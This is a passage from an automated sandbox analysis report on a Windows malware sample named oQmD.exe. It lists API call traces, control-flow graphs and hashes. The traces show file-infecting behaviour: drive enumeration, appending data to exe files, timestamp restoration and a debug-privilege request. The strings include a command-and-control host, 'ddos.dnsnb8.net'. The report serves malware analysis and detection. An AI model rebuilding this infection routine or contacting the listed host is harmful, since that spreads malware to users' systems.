301 8063da 298->301 302 8063dd-8063e1 298->302 299->266 303 8062d6-8062d9 300->303 304 8062da-8062f1 300->304 301->302 305 8063e3 302->305 306 8063e7-8063fa VirtualProtect 302->306 303->304 308 8062f3-8062f9 304->308 309 806365-80636e 304->309 305->306 306->277 306->279 310 806314-806326 308->310 311 8062fb-80630f 308->311 309->294 313 806328-80634a 310->313 314 80634c-806360 310->314 312 806426-8064a9 311->312 323 806519-80651c 312->323 324 8064ab-8064c0 312->324 313->309 314->312 325 806583-806587 323->325 326 80651d-80651e 323->326 330 8064c2 324->330 331 806535-806537 324->331 328 806588-80658b 325->328 329 806522-806533 326->329 332 8065a1-8065a3 328->332 333 80658d-80658f 328->333 329->331 336 8064c5-8064cd 330->336 337 8064f8 330->337 334 806539 331->334 335 80659a 331->335 343 806591-806593 333->343 344 8065b4 334->344 345 80653b-806541 334->345 338 80659b-80659d 335->338 339 806542-806545 336->339 340 8064cf-8064d4 336->340 341 8064fa-8064fe 337->341 342 80656c-80656f 337->342 338->343 346 80659f 338->346 347 80654d-806550 339->347 348 8064d6-8064d9 340->348 349 806517-806518 340->349 351 806500 341->351 352 806572 341->352 342->352 343->338 353 806595 343->353 350 8065be-806608 344->350 345->339 346->328 347->350 354 806552-806556 347->354 348->347 355 8064db-8064f5 348->355 349->323 351->329 356 806502 351->356 357 806573-806576 352->357 353->335 358 806578-80657f 354->358 359 806558-806569 354->359 355->337 356->357 360 806504-806513 356->360 357->358 358->325 359->342 360->331 362 806515 360->362 362->349
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 008060BE
                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 008060DF
                          • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00806189
                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 008061A5
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 1c5189ce20b561600f2114994692c26fd9f3ae4f2bc5cde4026f333bae989aae
                          • Instruction ID: 9ac0188ffbcae5a667077d3a98a4661f0f709efa32e6c3d918a57d0d8227093e
                          • Opcode Fuzzy Hash: 1c5189ce20b561600f2114994692c26fd9f3ae4f2bc5cde4026f333bae989aae
                          • Instruction Fuzzy Hash: B61212B25087898FDB728F24CC55BEA3BA0FF02314F1845ADE885CB2D2E674A931C755

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 364 802b8c-802bc6 memset GetLogicalDriveStringsA 365 802bc8-802bcc 364->365 366 802c09-802c28 WaitForMultipleObjects 364->366 367 802bfa-802c07 lstrlen 365->367 368 802bce-802bd0 365->368 369 802c2a-802c3a CreateThread 366->369 370 802c3c-802c45 366->370 367->365 367->366 368->367 371 802bd2-802bdc GetDriveTypeA 368->371 369->370 371->367 372 802bde-802be1 371->372 372->367 373 802be3-802bf6 CreateThread 372->373 373->367
                          APIs
                          • memset.MSVCRT ref: 00802BA6
                          • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00802BB4
                          • GetDriveTypeA.KERNEL32(?), ref: 00802BD3
                          • CreateThread.KERNEL32(00000000,00000000,00802B7D,?,00000000,00000000), ref: 00802BEE
                          • lstrlen.KERNEL32(?), ref: 00802BFB
                          • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00802C16
                          • CreateThread.KERNEL32(00000000,00000000,00802845,00000000,00000000,00000000), ref: 00802C3A
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                          • String ID:
                          • API String ID: 1073171358-0
                          • Opcode ID: d7f2e74ff702abc48b9ee1c5dd102e1ff8086c9e9f45b92a886a4a954a3ffc48
                          • Instruction ID: 599defc15dd5c192a67ac296d0e951b5ba9cd11033759b0e6f5517fcbe23088e
                          • Opcode Fuzzy Hash: d7f2e74ff702abc48b9ee1c5dd102e1ff8086c9e9f45b92a886a4a954a3ffc48
                          • Instruction Fuzzy Hash: 5721E7F184015CEFE7B09F649C88DAE7B6DFF04364B140125F992E2191D7B48D06CB61

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 16 801e6e-801e95 call 802d60 19 801e97 call 801d8a 16->19 20 801e9c-801eaa call 801df6 16->20 19->20 24 801eb0-801ed9 SetFileAttributesA CreateFileA 20->24 25 802332 20->25 24->25 27 801edf-801f28 call 801915 SetFilePointer CreateFileMappingA MapViewOfFile 24->27 26 802338-80233b 25->26 28 802346-802349 26->28 29 80233d-802340 UnmapViewOfFile 26->29 27->25 34 801f2e-801f39 27->34 31 802350-802354 28->31 32 80234b-80234e FindCloseChangeNotification 28->32 29->28 35 802391-80239a call 802d9b 31->35 36 802356-80235b CloseHandle 31->36 32->31 34->25 37 801f3f-801f56 34->37 36->35 37->25 39 801f5c-801f64 37->39 39->25 41 801f6a-801f70 39->41 41->25 42 801f76-801f87 call 801c81 41->42 42->25 45 801f8d-801fa7 call 80185b call 801c81 42->45 45->25 50 801fad-801fb4 45->50 51 802024-802045 50->51 52 801fb6-801fc5 call 801af9 50->52 51->25 53 80204b-80204e 51->53 52->51 59 801fc7-801fd2 52->59 55 802070-8020f4 call 801af9 * 2 call 801c68 * 2 memset * 2 53->55 56 802050-802053 53->56 78 8020f5-8020fe 55->78 60 802056-80205a 56->60 59->25 62 801fd8-801fe7 59->62 60->55 63 80205c-802061 60->63 65 801fe9-801fec 62->65 66 801fef-802006 call 801af9 62->66 63->25 67 802067-80206e 63->67 65->66 73 802013-80201e FlushViewOfFile 66->73 74 802008-80200e call 801c68 66->74 67->60 73->51 74->73 79 802130-802139 78->79 80 802100-802114 78->80 83 80213c-802142 79->83 81 802116-80212a 80->81 82 80212d-80212e 80->82 81->82 82->78 84 802144-802150 83->84 85 80215c 83->85 87 802152-802154 84->87 88 802157-80215a 84->88 86 80215f-802162 85->86 89 802181-802184 86->89 90 802164-802171 86->90 87->88 88->83 93 802186 89->93 94 80218d-8021ba call 801c68 89->94 91 802177-80217e 90->91 92 80232a-80232d 90->92 91->89 92->86 93->94 97 8021d3-80220b call 801c81 call 801c68 94->97 98 8021bc-8021d0 call 801c68 94->98 105 80221b-80221e 97->105 106 80220d-802218 call 801c68 97->106 98->97 108 802220-802223 105->108 109 802226-802328 memcpy UnmapViewOfFile CloseHandle call 801b8a call 80185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call 801915 FindCloseChangeNotification 105->109 106->105 108->109 109->26
                          APIs
                          • SetFileAttributesA.KERNEL32(?,00000080,?,008032B0,00000164,00802986,?), ref: 00801EB9
                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00801ECD
                          • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00801EF3
                          • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00801F07
                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00801F1D
                          • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0080201E
                          • memset.MSVCRT ref: 008020D8
                          • memset.MSVCRT ref: 008020EA
                          • memcpy.MSVCRT ref: 0080222D
                          • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00802238
                          • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0080224A
                          • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008022C6
                          • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008022CB
                          • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008022DD
                          • WriteFile.KERNEL32(000000FF,00804008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008022F7
                          • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0080230D
                          • FindCloseChangeNotification.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00802322
                          • UnmapViewOfFile.KERNEL32(?,?,008032B0,00000164,00802986,?), ref: 00802340
                          • FindCloseChangeNotification.KERNEL32(?,?,008032B0,00000164,00802986,?), ref: 0080234E
                          • CloseHandle.KERNEL32(000000FF,?,008032B0,00000164,00802986,?), ref: 00802359
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
                          • String ID:
                          • API String ID: 3349749541-0
                          • Opcode ID: 5f4d7386385d2ea325f3c77fae699d525911987bd164f1567da19295e057e201
                          • Instruction ID: 5a76099ba27d6872c86009d0e2581171c704077d0306aa04ffbb90881abb5b40
                          • Opcode Fuzzy Hash: 5f4d7386385d2ea325f3c77fae699d525911987bd164f1567da19295e057e201
                          • Instruction Fuzzy Hash: A5F15B71900608EFDBA0DFA8DC89AADBBB5FF08314F10452AE919E76A1D770AD51CF50

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 117 801973-80199a PathFileExistsA 118 8019a0-8019aa 117->118 119 801ac7-801acc 117->119 120 8019af-8019c2 CreateFileA 118->120 121 801ad0-801ad5 119->121 122 801ace 119->122 125 8019c4-8019d3 Sleep 120->125 126 801a28-801a36 GetFileSize 120->126 123 801af0-801af6 121->123 124 801ad7-801ad9 121->124 122->121 124->123 125->120 127 8019d5-801a0b call 80185b wsprintfA CopyFileA 125->127 128 801a87-801a8b 126->128 129 801a38-801a3b 126->129 127->126 143 801a0d-801a26 CreateFileA 127->143 131 801a96-801a9a 128->131 132 801a8d-801a90 FindCloseChangeNotification 128->132 129->128 130 801a3d-801a51 VirtualAlloc 129->130 130->128 134 801a53-801a57 130->134 135 801a9c 131->135 136 801aad-801ab1 131->136 132->131 138 801a80 134->138 139 801a59-801a6d ReadFile 134->139 140 801aa0-801aa7 DeleteFileA 135->140 141 801ab3-801ab6 136->141 142 801adb-801ae0 136->142 138->128 139->128 144 801a6f-801a7e 139->144 140->136 141->119 147 801ab8-801ac1 VirtualFree 141->147 145 801ae2-801ae5 142->145 146 801ae7-801aec 142->146 143->126 148 801a9e 143->148 144->138 144->139 145->146 146->123 149 801aee 146->149 147->119 148->140 149->123
                          APIs
                          • PathFileExistsA.SHLWAPI(00804E5C,00000000,C:\Users\user\AppData\Local\Temp\oQmD.exe), ref: 00801992
                          • CreateFileA.KERNEL32(00804E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 008019BA
                          • Sleep.KERNEL32(00000064), ref: 008019C6
                          • wsprintfA.USER32 ref: 008019EC
                          • CopyFileA.KERNEL32(00804E5C,?,00000000), ref: 00801A00
                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00801A1E
                          • GetFileSize.KERNEL32(00804E5C,00000000), ref: 00801A2C
                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00801A46
                          • ReadFile.KERNEL32(00804E5C,00804E60,00000000,?,00000000), ref: 00801A65
                          • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00801A90
                          • DeleteFileA.KERNEL32(?), ref: 00801AA7
                          • VirtualFree.KERNEL32(00804E60,00000000,00008000), ref: 00801AC1
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                          • String ID: %s%.8X.data$2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\oQmD.exe
                          • API String ID: 2523042076-4229179040
                          • Opcode ID: 421eb7d30c9dd51f5bc5579603ad74f32eeb1bb8fb63c6f122dc8aefa2849150
                          • Instruction ID: 5a0b6624a95bee8aa9fe7ce722e6ee8c75bc70587f1a1fd3997f976a4cd49a55
                          • Opcode Fuzzy Hash: 421eb7d30c9dd51f5bc5579603ad74f32eeb1bb8fb63c6f122dc8aefa2849150
                          • Instruction Fuzzy Hash: C8512D71A01229EFDF609F98DC88AAEBBBDFB05364F104569F515E61D0D3709E44CBA0

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 150 8028b8-8028ff memset wsprintfA 151 802905-80290d 150->151 152 8029db-8029df 150->152 151->152 153 802913-802919 151->153 154 802956-802965 strrchr 153->154 155 80291b-80294c memset wsprintfA call 8029e2 153->155 154->152 157 802967-802978 lstrcmpiA 154->157 158 802951 155->158 159 802988-802992 lstrcmpiA 157->159 160 80297a-802981 call 801e6e 157->160 158->152 159->152 161 802994-80299b 159->161 165 802986 160->165 163 8029ad-8029c9 strstr 161->163 164 80299d-8029a3 161->164 167 8029d3-8029d6 call 802692 163->167 168 8029cb-8029d1 call 80239d 163->168 164->163 166 8029a5-8029a7 lstrcpy 164->166 165->152 166->163 167->152 168->152
                          APIs
                          • memset.MSVCRT ref: 008028D3
                          • wsprintfA.USER32 ref: 008028F7
                          • memset.MSVCRT ref: 00802925
                          • wsprintfA.USER32 ref: 00802940
                            • Part of subcall function 008029E2: memset.MSVCRT ref: 00802A02
                            • Part of subcall function 008029E2: wsprintfA.USER32 ref: 00802A1A
                            • Part of subcall function 008029E2: memset.MSVCRT ref: 00802A44
                            • Part of subcall function 008029E2: lstrlen.KERNEL32(?), ref: 00802A54
                            • Part of subcall function 008029E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00802A6C
                            • Part of subcall function 008029E2: strrchr.MSVCRT ref: 00802A7C
                            • Part of subcall function 008029E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00802A9F
                            • Part of subcall function 008029E2: lstrlen.KERNEL32(Documents and Settings), ref: 00802AAE
                            • Part of subcall function 008029E2: memset.MSVCRT ref: 00802AC6
                            • Part of subcall function 008029E2: memset.MSVCRT ref: 00802ADA
                            • Part of subcall function 008029E2: FindFirstFileA.KERNEL32(?,?), ref: 00802AEF
                            • Part of subcall function 008029E2: memset.MSVCRT ref: 00802B13
                          • strrchr.MSVCRT ref: 00802959
                          • lstrcmpiA.KERNEL32(00000001,exe), ref: 00802974
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                          • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                          • API String ID: 3004273771-3007274656
                          • Opcode ID: e1de346a4cd810eb25e12e076f0f43463f7b589fa5f60e51739c0a5cfb3b9e80
                          • Instruction ID: 35686137405efb1597267cf5054e28650ca8054405ba501005c7b47e57cf13ca
                          • Opcode Fuzzy Hash: e1de346a4cd810eb25e12e076f0f43463f7b589fa5f60e51739c0a5cfb3b9e80
                          • Instruction Fuzzy Hash: 26319172A4031D7BEBA0AB68DC8DFDA7B6CFB15314F050452F585E21C1E6F49AC48BA1

                          Control-flow Graph

                          APIs
                          • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0080164F
                          • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0080165B
                          • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\oQmD.exe,00000104), ref: 0080166E
                          • CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 008016AC
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 008016BD
                            • Part of subcall function 0080139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\oQmD.exe), ref: 008013BC
                            • Part of subcall function 0080139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 008013DA
                            • Part of subcall function 0080139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00801448
                          • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\oQmD.exe), ref: 008016E5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\oQmD.exe$C:\Windows\system32$Documents and Settings
                          • API String ID: 123563730-3826284983
                          • Opcode ID: 92760773a3f63e355e4dcafb8d7ea9769a284a732bbc10d7c6a0cde1c8392572
                          • Instruction ID: 4ad53883514e1ee2cf91958058c0d471e129e247e1d4feff85e44daa13b9c4e3
                          • Opcode Fuzzy Hash: 92760773a3f63e355e4dcafb8d7ea9769a284a732bbc10d7c6a0cde1c8392572
                          • Instruction Fuzzy Hash: B011E2B2642624BBDFE06BA9AD4EEAB3E6DFF11371F000015F309D10E0C6718940CBA2

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 205 801000-801023 CreateFileA 206 801092-801096 205->206 207 801025-801055 GetFileSize CreateFileMappingA MapViewOfFile 205->207 208 801057-80105f 207->208 209 80107b-801085 207->209 210 801061-80106e call 8017d0 208->210 211 801074-801075 UnmapViewOfFile 208->211 212 801087-80108b CloseHandle 209->212 213 80108d-801091 CloseHandle 209->213 210->211 211->209 212->213 213->206
                          APIs
                          • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,008010E8,?), ref: 00801018
                          • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75BF8400,?,http://%s:%d/%s/%s,008010E8,?), ref: 00801029
                          • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00801038
                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,008010E8,?), ref: 0080104B
                          • UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,008010E8,?), ref: 00801075
                          • CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,008010E8,?), ref: 0080108B
                          • CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,008010E8,?), ref: 0080108E
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                          • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                          • API String ID: 1223616889-3273462101
                          • Opcode ID: 6715c0dc9c5b2d5c795afae7d1da00a5062ae5a620afa098509dfd4ee03af682
                          • Instruction ID: ca0ae3b9e2ff16f606751a93a350ea6c7fd2ac3e50d935dddadc5b7a258fedea
                          • Opcode Fuzzy Hash: 6715c0dc9c5b2d5c795afae7d1da00a5062ae5a620afa098509dfd4ee03af682
                          • Instruction Fuzzy Hash: BE0184B160165CBFE7705F609C89E2BBBACFB447A9F004529F285E2490D6705E448B60

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 374 802c48-802c75 memset call 801973 377 802cb2-802cb9 374->377 378 802c77-802c7f 374->378 381 802cc8-802ccc 377->381 382 802cbb-802cc2 VirtualFree 377->382 379 802c81-802c8b 378->379 380 802c8f-802cac CreateThread WaitForMultipleObjects 378->380 379->380 380->377 382->381
                          APIs
                          • memset.MSVCRT ref: 00802C57
                            • Part of subcall function 00801973: PathFileExistsA.SHLWAPI(00804E5C,00000000,C:\Users\user\AppData\Local\Temp\oQmD.exe), ref: 00801992
                            • Part of subcall function 00801973: CreateFileA.KERNEL32(00804E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 008019BA
                            • Part of subcall function 00801973: Sleep.KERNEL32(00000064), ref: 008019C6
                            • Part of subcall function 00801973: wsprintfA.USER32 ref: 008019EC
                            • Part of subcall function 00801973: CopyFileA.KERNEL32(00804E5C,?,00000000), ref: 00801A00
                            • Part of subcall function 00801973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00801A1E
                            • Part of subcall function 00801973: GetFileSize.KERNEL32(00804E5C,00000000), ref: 00801A2C
                            • Part of subcall function 00801973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00801A46
                            • Part of subcall function 00801973: ReadFile.KERNEL32(00804E5C,00804E60,00000000,?,00000000), ref: 00801A65
                          • CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 00802C99
                          • WaitForMultipleObjects.KERNEL32(00000001,008016BA,00000001,000000FF,?,008016BA,00000000), ref: 00802CAC
                          • VirtualFree.KERNEL32(00AE0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\oQmD.exe,00804E5C,00804E60,?,008016BA,00000000), ref: 00802CC2
                          Strings
                          • C:\Users\user\AppData\Local\Temp\oQmD.exe, xrefs: 00802C69
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                          • String ID: C:\Users\user\AppData\Local\Temp\oQmD.exe
                          • API String ID: 2042498389-4270170564
                          • Opcode ID: b6e60a4d8f2262f9df5348034521c6c005132b1c6c667f32ac51228254bcb2e9
                          • Instruction ID: 3d878c3d1bcf38f9c1e45d3571fdb9de19bde57d5c257375631e8a73262c305b
                          • Opcode Fuzzy Hash: b6e60a4d8f2262f9df5348034521c6c005132b1c6c667f32ac51228254bcb2e9
                          • Instruction Fuzzy Hash: 10018FB16812207AE790ABA5DC1EEAF7E6CFF01B60F104124BA15D62D1D6E49A00C7B1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 383 8014e1-8014fb 384 801541-801547 383->384 385 8014fd-801510 GetModuleHandleA 383->385 388 801573-801574 call 801638 384->388 389 801549-80154c 384->389 386 801512-801518 385->386 387 80151a-801535 VirtualQuery 385->387 386->384 391 801537-801539 387->391 392 80153b 387->392 395 801579-80157a ExitProcess 388->395 393 801569-801570 389->393 394 80154e-801555 389->394 391->384 391->392 392->384 394->393 396 801557-801566 call 801af9 394->396 396->393
                          APIs
                          • GetModuleHandleA.KERNEL32(00000000), ref: 00801504
                          • VirtualQuery.KERNEL32(008014E1,?,0000001C), ref: 00801525
                          • ExitProcess.KERNEL32 ref: 0080157A
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: ExitHandleModuleProcessQueryVirtual
                          • String ID:
                          • API String ID: 3946701194-0
                          • Opcode ID: 92cf91f2856dc334556de97e7d23272263f86d241d17b904824b214219154c47
                          • Instruction ID: 9e8c75fa52044bce48880576005812ed92e0d71f0044e29328bbfc6e1533e55e
                          • Opcode Fuzzy Hash: 92cf91f2856dc334556de97e7d23272263f86d241d17b904824b214219154c47
                          • Instruction Fuzzy Hash: D5117CB1A81214DFCFA0EFA5AC89A7DB7BCFB94724B10502EF902DB190D2348941EB51

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 399 801915-801922 400 801924-801926 399->400 401 801928-80192c 399->401 402 80196e-801970 400->402 403 80192e-80194d memset GetFileTime 401->403 404 80194f-801952 401->404 405 801966-801968 403->405 404->402 406 801954-801960 SetFileTime 404->406 407 80196a 405->407 408 80196c 405->408 406->405 407->408 408->402
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
